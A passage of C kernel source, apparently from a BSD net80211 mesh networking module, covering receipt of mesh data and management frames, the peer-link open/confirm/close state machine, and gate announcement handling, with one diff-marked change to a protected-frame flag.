*(uint16_t *)qos = *(uint16_t *) ((struct ieee80211_qosframe_addr4 *)wh)->i_qos; else *(uint16_t *)qos = *(uint16_t *) ((struct ieee80211_qosframe *)wh)->i_qos; /* * NB: The mesh STA sets the Mesh Control Present * subfield to 1 in the Mesh Data frame containing * an unfragmented MSDU, an A-MSDU, or the first * fragment of an MSDU. * After defrag it should always be present. */ if (!(qos[1] & IEEE80211_QOS_MC)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "%s", "Mesh control field not present"); vap->iv_stats.is_rx_elem_missing++; /* XXX: kinda */ goto err; } /* pull up enough to get to the mesh control */ if (m->m_len < hdrspace + sizeof(struct ieee80211_meshcntl) && (m = m_pullup(m, hdrspace + sizeof(struct ieee80211_meshcntl))) == NULL) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* * Now calculate the full extent of the headers. Note * mesh_decap will pull up anything we didn't get * above when it strips the 802.11 headers. */ mc = (const struct ieee80211_meshcntl *) (mtod(m, const uint8_t *) + hdrspace); ae = mc->mc_flags & IEEE80211_MESH_AE_MASK; meshdrlen = sizeof(struct ieee80211_meshcntl) + ae * IEEE80211_ADDR_LEN; hdrspace += meshdrlen; /* pull complete hdrspace = ieee80211_hdrspace + meshcontrol */ if ((meshdrlen > sizeof(struct ieee80211_meshcntl)) && (m->m_len < hdrspace) && ((m = m_pullup(m, hdrspace)) == NULL)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, NULL, "data too short: expecting %u", hdrspace); vap->iv_stats.is_rx_tooshort++; goto out; /* XXX */ } /* XXX: are we sure there is no reallocating after m_pullup? */ seq = LE_READ_4(mc->mc_seq); if (IEEE80211_IS_MULTICAST(wh->i_addr1)) addr = wh->i_addr3; else if (ae == IEEE80211_MESH_AE_01) addr = MC01(mc)->mc_addr4; else addr = ((struct ieee80211_qosframe_addr4 *)wh)->i_addr4; if (IEEE80211_ADDR_EQ(vap->iv_myaddr, addr)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, addr, "data", "%s", "not to me"); vap->iv_stats.is_rx_wrongbss++; /* XXX kinda */ goto out; } if (mesh_checkpseq(vap, addr, seq) != 0) { vap->iv_stats.is_rx_dup++; goto out; } /* This code "routes" the frame to the right control path */ if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { if (IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr3)) error = mesh_recv_indiv_data_to_me(vap, m, wh, mc); else if (IEEE80211_IS_MULTICAST(wh->i_addr3)) error = mesh_recv_group_data(vap, m, wh, mc); else error = mesh_recv_indiv_data_to_fwrd(vap, m, wh, mc); } else error = mesh_recv_group_data(vap, m, wh, mc); if (error < 0) goto err; else if (error > 0) goto out; if (ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); need_tap = 0; /* * Finally, strip the 802.11 header. */ m = mesh_decap(vap, m, hdrspace, meshdrlen); if (m == NULL) { /* XXX mask bit to check for both */ /* don't count Null data frames as errors */ if (subtype == IEEE80211_FC0_SUBTYPE_NODATA || subtype == IEEE80211_FC0_SUBTYPE_QOS_NULL) goto out; IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_INPUT, ni->ni_macaddr, "data", "%s", "decap error"); vap->iv_stats.is_rx_decap++; IEEE80211_NODE_STAT(ni, rx_decap); goto err; } if (qos[0] & IEEE80211_QOS_AMSDU) { m = ieee80211_decap_amsdu(ni, m); if (m == NULL) return IEEE80211_FC0_TYPE_DATA; } ieee80211_deliver_data(vap, ni, m); return type; case IEEE80211_FC0_TYPE_MGT: vap->iv_stats.is_rx_mgmt++; IEEE80211_NODE_STAT(ni, rx_mgmt); if (dir != IEEE80211_FC1_DIR_NODS) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "mgt", "incorrect dir 0x%x", dir); vap->iv_stats.is_rx_wrongdir++; goto err; } if (m->m_pkthdr.len < sizeof(struct ieee80211_frame)) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_ANY, ni->ni_macaddr, "mgt", "too short: len %u", m->m_pkthdr.len); vap->iv_stats.is_rx_tooshort++; goto out; } #ifdef IEEE80211_DEBUG if ((ieee80211_msg_debug(vap) && (vap->iv_ic->ic_flags & IEEE80211_F_SCAN)) || ieee80211_msg_dumppkts(vap)) { if_printf(ifp, "received %s from %s rssi %d\n", ieee80211_mgt_subtype_name[subtype >> IEEE80211_FC0_SUBTYPE_SHIFT], ether_sprintf(wh->i_addr2), rssi); } #endif - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "WEP set but not permitted"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX */ goto out; } vap->iv_recv_mgmt(ni, m, subtype, rssi, nf); goto out; case IEEE80211_FC0_TYPE_CTL: vap->iv_stats.is_rx_ctl++; IEEE80211_NODE_STAT(ni, rx_ctrl); goto out; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "bad", "frame type 0x%x", type); /* should not come here */ break; } err: ifp->if_ierrors++; out: if (m != NULL) { if (need_tap && ieee80211_radiotap_active_vap(vap)) ieee80211_radiotap_rx(vap, m); m_freem(m); } return type; #undef HAS_SEQ #undef MC01 #undef MC10 } static void mesh_recv_mgmt(struct ieee80211_node *ni, struct mbuf *m0, int subtype, int rssi, int nf) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_frame *wh; struct ieee80211_mesh_route *rt; uint8_t *frm, *efrm; wh = mtod(m0, struct ieee80211_frame *); frm = (uint8_t *)&wh[1]; efrm = mtod(m0, uint8_t *) + m0->m_len; switch (subtype) { case IEEE80211_FC0_SUBTYPE_PROBE_RESP: case IEEE80211_FC0_SUBTYPE_BEACON: { struct ieee80211_scanparams scan; /* * We process beacon/probe response * frames to discover neighbors. */ if (ieee80211_parse_beacon(ni, m0, &scan) != 0) return; /* * Count frame now that we know it's to be processed. */ if (subtype == IEEE80211_FC0_SUBTYPE_BEACON) { vap->iv_stats.is_rx_beacon++; /* XXX remove */ IEEE80211_NODE_STAT(ni, rx_beacons); } else IEEE80211_NODE_STAT(ni, rx_proberesp); /* * If scanning, just pass information to the scan module. */ if (ic->ic_flags & IEEE80211_F_SCAN) { if (ic->ic_flags_ext & IEEE80211_FEXT_PROBECHAN) { /* * Actively scanning a channel marked passive; * send a probe request now that we know there * is 802.11 traffic present. * * XXX check if the beacon we recv'd gives * us what we need and suppress the probe req */ ieee80211_probe_curchan(vap, 1); ic->ic_flags_ext &= ~IEEE80211_FEXT_PROBECHAN; } ieee80211_add_scan(vap, &scan, wh, subtype, rssi, nf); return; } /* The rest of this code assumes we are running */ if (vap->iv_state != IEEE80211_S_RUN) return; /* * Ignore non-mesh STAs. */ if ((scan.capinfo & (IEEE80211_CAPINFO_ESS|IEEE80211_CAPINFO_IBSS)) || scan.meshid == NULL || scan.meshconf == NULL) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "beacon", "%s", "not a mesh sta"); vap->iv_stats.is_mesh_wrongmesh++; return; } /* * Ignore STAs for other mesh networks. */ if (memcmp(scan.meshid+2, ms->ms_id, ms->ms_idlen) != 0 || mesh_verify_meshconf(vap, scan.meshconf)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, "beacon", "%s", "not for our mesh"); vap->iv_stats.is_mesh_wrongmesh++; return; } /* * Peer only based on the current ACL policy. */ if (vap->iv_acl != NULL && !vap->iv_acl->iac_check(vap, wh)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_ACL, wh, NULL, "%s", "disallowed by ACL"); vap->iv_stats.is_rx_acl++; return; } /* * Do neighbor discovery. */ if (!IEEE80211_ADDR_EQ(wh->i_addr2, ni->ni_macaddr)) { /* * Create a new entry in the neighbor table. */ ni = ieee80211_add_neighbor(vap, wh, &scan); } /* * Automatically peer with discovered nodes if possible. */ if (ni != vap->iv_bss && (ms->ms_flags & IEEE80211_MESHFLAGS_AP)) { switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: { uint16_t args[1]; /* Wait for backoff callout to reset counter */ if (ni->ni_mlhcnt >= ieee80211_mesh_maxholding) return; ni->ni_mlpid = mesh_generateid(vap); if (ni->ni_mlpid == 0) return; mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENSNT); args[0] = ni->ni_mlpid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); ni->ni_mlrcnt = 0; mesh_peer_timeout_setup(ni); break; } case IEEE80211_NODE_MESH_ESTABLISHED: { /* * Valid beacon from a peer mesh STA * bump TA lifetime */ rt = ieee80211_mesh_rt_find(vap, wh->i_addr2); if(rt != NULL) { ieee80211_mesh_rt_update(rt, ticks_to_msecs( ms->ms_ppath->mpp_inact)); } break; } default: break; /* ignore */ } } break; } case IEEE80211_FC0_SUBTYPE_PROBE_REQ: { uint8_t *ssid, *meshid, *rates, *xrates; uint8_t *sfrm; if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; return; } if (IEEE80211_IS_MULTICAST(wh->i_addr2)) { /* frame must be directed */ IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not unicast"); vap->iv_stats.is_rx_mgtdiscard++; /* XXX stat */ return; } /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [tlv] mesh id */ ssid = meshid = rates = xrates = NULL; sfrm = frm; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return); switch (*frm) { case IEEE80211_ELEMID_SSID: ssid = frm; break; case IEEE80211_ELEMID_RATES: rates = frm; break; case IEEE80211_ELEMID_XRATES: xrates = frm; break; case IEEE80211_ELEMID_MESHID: meshid = frm; break; } frm += frm[1] + 2; } IEEE80211_VERIFY_ELEMENT(ssid, IEEE80211_NWID_LEN, return); IEEE80211_VERIFY_ELEMENT(rates, IEEE80211_RATE_MAXSIZE, return); if (xrates != NULL) IEEE80211_VERIFY_ELEMENT(xrates, IEEE80211_RATE_MAXSIZE - rates[1], return); if (meshid != NULL) { IEEE80211_VERIFY_ELEMENT(meshid, IEEE80211_MESHID_LEN, return); /* NB: meshid, not ssid */ IEEE80211_VERIFY_SSID(vap->iv_bss, meshid, return); } /* XXX find a better class or define it's own */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_INPUT, wh->i_addr2, "%s", "recv probe req"); /* * Some legacy 11b clients cannot hack a complete * probe response frame. When the request includes * only a bare-bones rate set, communicate this to * the transmit side. */ ieee80211_send_proberesp(vap, wh->i_addr2, 0); break; } case IEEE80211_FC0_SUBTYPE_ACTION: case IEEE80211_FC0_SUBTYPE_ACTION_NOACK: if (ni == vap->iv_bss) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "unknown node"); vap->iv_stats.is_rx_mgtdiscard++; } else if (!IEEE80211_ADDR_EQ(vap->iv_myaddr, wh->i_addr1) && !IEEE80211_IS_MULTICAST(wh->i_addr1)) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not for us"); vap->iv_stats.is_rx_mgtdiscard++; } else if (vap->iv_state != IEEE80211_S_RUN) { IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "wrong state %s", ieee80211_state_name[vap->iv_state]); vap->iv_stats.is_rx_mgtdiscard++; } else { if (ieee80211_parse_action(ni, m0) == 0) (void)ic->ic_recv_action(ni, wh, frm, efrm); } break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: case IEEE80211_FC0_SUBTYPE_ATIM: case IEEE80211_FC0_SUBTYPE_DISASSOC: case IEEE80211_FC0_SUBTYPE_AUTH: case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_DISCARD(vap, IEEE80211_MSG_INPUT, wh, NULL, "%s", "not handled"); vap->iv_stats.is_rx_mgtdiscard++; break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ANY, wh, "mgt", "subtype 0x%x not handled", subtype); vap->iv_stats.is_rx_badsubtype++; break; } } static void mesh_recv_ctl(struct ieee80211_node *ni, struct mbuf *m, int subtype) { switch (subtype) { case IEEE80211_FC0_SUBTYPE_BAR: ieee80211_recv_bar(ni, m); break; } } /* * Parse meshpeering action ie's for MPM frames */ static const struct ieee80211_meshpeer_ie * mesh_parse_meshpeering_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, /* XXX for VERIFY_LENGTH */ const uint8_t *frm, const uint8_t *efrm, struct ieee80211_meshpeer_ie *mp, uint8_t subtype) { struct ieee80211vap *vap = ni->ni_vap; const struct ieee80211_meshpeer_ie *mpie; uint16_t args[3]; const uint8_t *meshid, *meshconf, *meshpeer; uint8_t sendclose = 0; /* 1 = MPM frame rejected, close will be sent */ meshid = meshconf = meshpeer = NULL; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return NULL); switch (*frm) { case IEEE80211_ELEMID_MESHID: meshid = frm; break; case IEEE80211_ELEMID_MESHCONF: meshconf = frm; break; case IEEE80211_ELEMID_MESHPEER: meshpeer = frm; mpie = (const struct ieee80211_meshpeer_ie *) frm; memset(mp, 0, sizeof(*mp)); mp->peer_len = mpie->peer_len; mp->peer_proto = LE_READ_2(&mpie->peer_proto); mp->peer_llinkid = LE_READ_2(&mpie->peer_llinkid); switch (subtype) { case IEEE80211_ACTION_MESHPEERING_CONFIRM: mp->peer_linkid = LE_READ_2(&mpie->peer_linkid); break; case IEEE80211_ACTION_MESHPEERING_CLOSE: /* NB: peer link ID is optional */ if (mpie->peer_len == (IEEE80211_MPM_BASE_SZ + 2)) { mp->peer_linkid = 0; mp->peer_rcode = LE_READ_2(&mpie->peer_linkid); } else { mp->peer_linkid = LE_READ_2(&mpie->peer_linkid); mp->peer_rcode = LE_READ_2(&mpie->peer_rcode); } break; } break; } frm += frm[1] + 2; } /* * Verify the contents of the frame. * If it fails validation, close the peer link. */ if (mesh_verify_meshpeer(vap, subtype, (const uint8_t *)mp)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "MPM validation failed"); } /* If meshid is not the same reject any frames type. */ if (sendclose == 0 && mesh_verify_meshid(vap, meshid)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "not for our mesh"); if (subtype == IEEE80211_ACTION_MESHPEERING_CLOSE) { /* * Standard not clear about this, if we dont ignore * there will be an endless loop between nodes sending * CLOSE frames between each other with wrong meshid. * Discard and timers will bring FSM to IDLE state. */ return NULL; } } /* * Close frames are accepted if meshid is the same. * Verify the other two types. */ if (sendclose == 0 && subtype != IEEE80211_ACTION_MESHPEERING_CLOSE && mesh_verify_meshconf(vap, meshconf)) { sendclose = 1; IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "%s", "configuration missmatch"); } if (sendclose) { vap->iv_stats.is_rx_mgtdiscard++; switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: case IEEE80211_NODE_MESH_ESTABLISHED: case IEEE80211_NODE_MESH_HOLDING: /* ignore */ break; case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_OPENRCV: case IEEE80211_NODE_MESH_CONFIRMRCV: args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; /* Reason codes for rejection */ switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: args[2] = IEEE80211_REASON_MESH_CPVIOLATION; break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: args[2] = IEEE80211_REASON_MESH_INCONS_PARAMS; break; } ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } return NULL; } return (const struct ieee80211_meshpeer_ie *) mp; } static int mesh_recv_action_meshpeering_open(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2+2 for action + code + capabilites */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_OPEN); if (meshpeer == NULL) { return 0; } /* XXX move up */ IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "recv PEER OPEN, lid 0x%x", meshpeer->peer_llinkid); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: /* Reject open request if reached our maximum neighbor count */ if (ms->ms_neighbors >= IEEE80211_MESH_MAX_NEIGHBORS) { args[0] = meshpeer->peer_llinkid; args[1] = 0; args[2] = IEEE80211_REASON_MESH_MAX_PEERS; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); /* stay in IDLE state */ return (0); } /* Open frame accepted */ mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENRCV); ni->ni_mllid = meshpeer->peer_llinkid; ni->ni_mlpid = mesh_generateid(vap); if (ni->ni_mlpid == 0) return 0; /* XXX */ args[0] = ni->ni_mlpid; /* Announce we're open too... */ ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); /* ...and confirm the link. */ args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_OPENRCV: /* Wrong Link ID */ if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mllid; args[1] = ni->ni_mlpid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } /* Duplicate open, confirm again. */ args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); break; case IEEE80211_NODE_MESH_OPENSNT: ni->ni_mllid = meshpeer->peer_llinkid; mesh_linkchange(ni, IEEE80211_NODE_MESH_OPENRCV); args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); /* NB: don't setup/clear any timeout */ break; case IEEE80211_NODE_MESH_CONFIRMRCV: if (ni->ni_mlpid != meshpeer->peer_linkid || ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } mesh_linkchange(ni, IEEE80211_NODE_MESH_ESTABLISHED); ni->ni_mllid = meshpeer->peer_llinkid; args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); mesh_peer_timeout_stop(ni); break; case IEEE80211_NODE_MESH_ESTABLISHED: if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mllid; args[1] = ni->ni_mlpid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; } args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CONFIRM, args); break; case IEEE80211_NODE_MESH_HOLDING: args[0] = ni->ni_mlpid; args[1] = meshpeer->peer_llinkid; /* Standard not clear about what the reaason code should be */ args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); break; } return 0; } static int mesh_recv_action_meshpeering_confirm(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2+2+2+2 for action + code + capabilites + status code + AID */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2+2+2+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_CONFIRM); if (meshpeer == NULL) { return 0; } IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "recv PEER CONFIRM, local id 0x%x, peer id 0x%x", meshpeer->peer_llinkid, meshpeer->peer_linkid); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_OPENRCV: mesh_linkchange(ni, IEEE80211_NODE_MESH_ESTABLISHED); mesh_peer_timeout_stop(ni); break; case IEEE80211_NODE_MESH_OPENSNT: mesh_linkchange(ni, IEEE80211_NODE_MESH_CONFIRMRCV); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: args[0] = ni->ni_mlpid; args[1] = meshpeer->peer_llinkid; /* Standard not clear about what the reaason code should be */ args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); break; case IEEE80211_NODE_MESH_CONFIRMRCV: if (ni->ni_mllid != meshpeer->peer_llinkid) { args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_PEER_LINK_CANCELED; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); } break; default: IEEE80211_DISCARD(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, wh, NULL, "received confirm in invalid state %d", ni->ni_mlstate); vap->iv_stats.is_rx_mgtdiscard++; break; } return 0; } static int mesh_recv_action_meshpeering_close(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211_meshpeer_ie ie; const struct ieee80211_meshpeer_ie *meshpeer; uint16_t args[3]; /* +2 for action + code */ meshpeer = mesh_parse_meshpeering_action(ni, wh, frm+2, efrm, &ie, IEEE80211_ACTION_MESHPEERING_CLOSE); if (meshpeer == NULL) { return 0; } /* * XXX: check reason code, for example we could receive * IEEE80211_REASON_MESH_MAX_PEERS then we should not attempt * to peer again. */ IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "%s", "recv PEER CLOSE"); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: /* ignore */ break; case IEEE80211_NODE_MESH_OPENRCV: case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_CONFIRMRCV: case IEEE80211_NODE_MESH_ESTABLISHED: args[0] = ni->ni_mlpid; args[1] = ni->ni_mllid; args[2] = IEEE80211_REASON_MESH_CLOSE_RCVD; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: mesh_linkchange(ni, IEEE80211_NODE_MESH_IDLE); mesh_peer_timeout_stop(ni); break; } return 0; } /* * Link Metric handling. */ static int mesh_recv_action_meshlmetric(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { const struct ieee80211_meshlmetric_ie *ie = (const struct ieee80211_meshlmetric_ie *) (frm+2); /* action + code */ struct ieee80211_meshlmetric_ie lm_rep; if (ie->lm_flags & IEEE80211_MESH_LMETRIC_FLAGS_REQ) { lm_rep.lm_flags = 0; lm_rep.lm_metric = mesh_airtime_calc(ni); ieee80211_send_action(ni, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_LMETRIC, &lm_rep); } /* XXX: else do nothing for now */ return 0; } /* * Parse meshgate action ie's for GANN frames. * Returns -1 if parsing fails, otherwise 0. */ static int mesh_parse_meshgate_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, /* XXX for VERIFY_LENGTH */ struct ieee80211_meshgann_ie *ie, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; const struct ieee80211_meshgann_ie *gannie; while (efrm - frm > 1) { IEEE80211_VERIFY_LENGTH(efrm - frm, frm[1] + 2, return -1); switch (*frm) { case IEEE80211_ELEMID_MESHGANN: gannie = (const struct ieee80211_meshgann_ie *) frm; memset(ie, 0, sizeof(*ie)); ie->gann_ie = gannie->gann_ie; ie->gann_len = gannie->gann_len; ie->gann_flags = gannie->gann_flags; ie->gann_hopcount = gannie->gann_hopcount; ie->gann_ttl = gannie->gann_ttl; IEEE80211_ADDR_COPY(ie->gann_addr, gannie->gann_addr); ie->gann_seq = LE_READ_4(&gannie->gann_seq); ie->gann_interval = LE_READ_2(&gannie->gann_interval); break; } frm += frm[1] + 2; } return 0; } /* * Mesh Gate Announcement handling. */ static int mesh_recv_action_meshgate(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; struct ieee80211_mesh_gate_route *gr, *next; struct ieee80211_mesh_route *rt_gate; struct ieee80211_meshgann_ie pgann; struct ieee80211_meshgann_ie ie; int found = 0; /* +2 for action + code */ if (mesh_parse_meshgate_action(ni, wh, &ie, frm+2, efrm) != 0) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "%s", "GANN parsing failed"); vap->iv_stats.is_rx_mgtdiscard++; return (0); } if (IEEE80211_ADDR_EQ(vap->iv_myaddr, ie.gann_addr)) return 0; IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, "received GANN, meshgate: %6D (seq %u)", ie.gann_addr, ":", ie.gann_seq); if (ms == NULL) return (0); MESH_RT_LOCK(ms); TAILQ_FOREACH_SAFE(gr, &ms->ms_known_gates, gr_next, next) { if (!IEEE80211_ADDR_EQ(gr->gr_addr, ie.gann_addr)) continue; if (ie.gann_seq <= gr->gr_lastseq) { IEEE80211_DISCARD_MAC(vap, IEEE80211_MSG_MESH, ni->ni_macaddr, NULL, "GANN old seqno %u <= %u", ie.gann_seq, gr->gr_lastseq); MESH_RT_UNLOCK(ms); return (0); } /* corresponding mesh gate found & GANN accepted */ found = 1; break; } if (found == 0) { /* this GANN is from a new mesh Gate add it to known table. */ IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ie.gann_addr, "stored new GANN information, seq %u.", ie.gann_seq); gr = malloc(ALIGN(sizeof(struct ieee80211_mesh_gate_route)), M_80211_MESH_GT_RT, M_NOWAIT | M_ZERO); IEEE80211_ADDR_COPY(gr->gr_addr, ie.gann_addr); TAILQ_INSERT_TAIL(&ms->ms_known_gates, gr, gr_next); } gr->gr_lastseq = ie.gann_seq; /* check if we have a path to this gate */ rt_gate = mesh_rt_find_locked(ms, gr->gr_addr); if (rt_gate != NULL && rt_gate->rt_flags & IEEE80211_MESHRT_FLAGS_VALID) { gr->gr_route = rt_gate; rt_gate->rt_flags |= IEEE80211_MESHRT_FLAGS_GATE; } MESH_RT_UNLOCK(ms); /* popagate only if decremented ttl >= 1 && forwarding is enabled */ if ((ie.gann_ttl - 1) < 1 && !(ms->ms_flags & IEEE80211_MESHFLAGS_FWD)) return 0; pgann.gann_flags = ie.gann_flags; /* Reserved */ pgann.gann_hopcount = ie.gann_hopcount + 1; pgann.gann_ttl = ie.gann_ttl - 1; IEEE80211_ADDR_COPY(pgann.gann_addr, ie.gann_addr); pgann.gann_seq = ie.gann_seq; pgann.gann_interval = ie.gann_interval; 